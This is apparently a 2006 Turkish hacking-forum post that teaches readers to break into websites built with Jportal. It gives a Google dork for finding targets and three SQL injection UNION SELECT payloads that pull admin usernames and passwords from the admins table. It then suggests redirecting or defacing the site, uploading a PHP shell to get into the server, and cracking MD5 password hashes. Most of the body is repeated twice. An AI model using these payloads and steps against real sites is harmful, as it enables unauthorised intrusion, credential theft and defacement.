hacked by_alp
04-24-2006, 02:32 PM
Jportal ile yapılmış olan sitelere sql enjekte etmeyi anlatacağım.Bunun için ilk önce google den Jportal ile yapılmış olan siteleri bulacağız.Bunun için de google de “powered by Jportal” filetypehp yazmanız yeterli olacaktır.(Sitelerin %98 i pl olduğu için arama yaparken ülke belirtmenize gerek yok.Yok ben illede yazacağım diyorsanız site:com net org veya pl )
Sitemizi bulduk şimdi bunu hacklemek için 3 tane yöntemimiz var.Ben kolay olanı ile başlamak istiyorum.(Ben bayağı sömürdüm kalanlar ile idare edin )
1.Açığımız...(Benim Tavsiye Ettiğim)
[Only Registered Users Can See Links] ([Only Registered Users Can See Links]) AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
2.Açığımız...
[Only Registered Users Can See Links] ([Only Registered Users Can See Links]) sitemize gidip oradaki bölüme aşşağıdaki kodu yazarak admin şifresine ulaşabiliriz.
’ UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where ’1=1
’ UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where ’1=1
3.Açığımız
[Only Registered Users Can See Links] ([Only Registered Users Can See Links]) veya [Only Registered Users Can See Links] ([Only Registered Users Can See Links]) sitemize gidip oradaki bölüme aşşağıdaki kodları yazarak da admin şifresine ulaşabiliriz.
a%’ UNION SELECT NULL , NULL , nick , pass, NULL , NULL , NULL , NULL , NULL , NULL , NULL , NULL FROM admins/*
Bunlar ile neler yapabilirim?
[Only Registered Users Can See Links] ([Only Registered Users Can See Links]) adresinden admin girişi yaptıktan sonra ister başka siteye yönlendirin, İster haber(Newsy) bölümünden Haber ekleyin ana safyada yayımlansın bu size kalmış.Ayrıca haber bölümünde Upload yeri var buraya da istediğiniz index i upload edebilirsiniz veya bir php Fso ile sistemede sıza bilirsiniz geliştirmek size kalmış...
Not: Admin şifresi Çoğunlukla normal gözükmesine karşı bazı sitelerde md5 ile şifrelenmiş olarak çıkabilmektedir.
Md5 şifresini çözücü
[Only Registered Users Can See Links] ([Only Registered Users Can See Links])
Sitemizi bulduk şimdi bunu hacklemek için 3 tane yöntemimiz var.Ben kolay olanı ile başlamak istiyorum.(Ben bayağı sömürdüm kalanlar ile idare edin )
1.Açığımız...(Benim Tavsiye Ettiğim)
[Only Registered Users Can See Links] ([Only Registered Users Can See Links]) AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
2.Açığımız...
[Only Registered Users Can See Links] ([Only Registered Users Can See Links]) sitemize gidip oradaki bölüme aşşağıdaki kodu yazarak admin şifresine ulaşabiliriz.
’ UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where ’1=1
’ UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where ’1=1
3.Açığımız
[Only Registered Users Can See Links] ([Only Registered Users Can See Links]) veya [Only Registered Users Can See Links] ([Only Registered Users Can See Links]) sitemize gidip oradaki bölüme aşşağıdaki kodları yazarak da admin şifresine ulaşabiliriz.
a%’ UNION SELECT NULL , NULL , nick , pass, NULL , NULL , NULL , NULL , NULL , NULL , NULL , NULL FROM admins/*
Bunlar ile neler yapabilirim?
[Only Registered Users Can See Links] ([Only Registered Users Can See Links]) adresinden admin girişi yaptıktan sonra ister başka siteye yönlendirin, İster haber(Newsy) bölümünden Haber ekleyin ana safyada yayımlansın bu size kalmış.Ayrıca haber bölümünde Upload yeri var buraya da istediğiniz index i upload edebilirsiniz veya bir php Fso ile sistemede sıza bilirsiniz geliştirmek size kalmış...
Not: Admin şifresi Çoğunlukla normal gözükmesine karşı bazı sitelerde md5 ile şifrelenmiş olarak çıkabilmektedir.
Md5 şifresini çözücü
[Only Registered Users Can See Links] ([Only Registered Users Can See Links])